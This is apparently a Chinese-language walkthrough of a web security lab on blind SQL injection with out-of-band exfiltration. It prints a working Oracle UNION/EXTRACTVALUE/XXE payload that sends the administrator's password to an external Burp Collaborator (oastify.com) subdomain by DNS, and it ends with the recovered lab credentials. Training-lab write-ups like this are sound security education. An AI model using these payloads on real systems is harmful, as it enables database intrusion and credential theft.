# Web SQL injection Lab17
這題是進階版的 盲注 + Out-of-Band 資料外洩(Data Exfiltration),關鍵在於:
不只是讓伺服器去查 Collaborator,而是讓它把密碼資料塞進查詢的子網域,讓你在 Burp Collaborator 裡看到完整的資料。
---
一樣先進入網站並攔截請求。


然後獲得專屬的 Collaborator 子網域。

```
h3lzjvjshx3dqlmx1fj8qdfs3j9bx4lt.oastify.com
```
接下來要發出 DNS 查詢。
```
'+UNION+SELECT+EXTRACTVALUE(xmltype('<!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http://'||(SELECT+password+FROM+users+WHERE+username='administrator')||'.abc123xyz.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--
```
:::info
因為要查詢密碼,所以在後面再塞一段密碼查詢語法。
```
'||(SELECT+password+FROM+users+WHERE+username='administrator')||'
```
:::
放入我們的子網域:
```
'+UNION+SELECT+EXTRACTVALUE(xmltype('<!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http://'||(SELECT+password+FROM+users+WHERE+username='administrator')||'.h3lzjvjshx3dqlmx1fj8qdfs3j9bx4lt.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--
```

成功送出後,我們到 Collaborator 中點 Poll now,就可以看到我們剛剛的 DNS 查詢紀錄。

把帳密拿去登入就可以完成本題。
`administra:hdch58dbionbxsfagrze`

---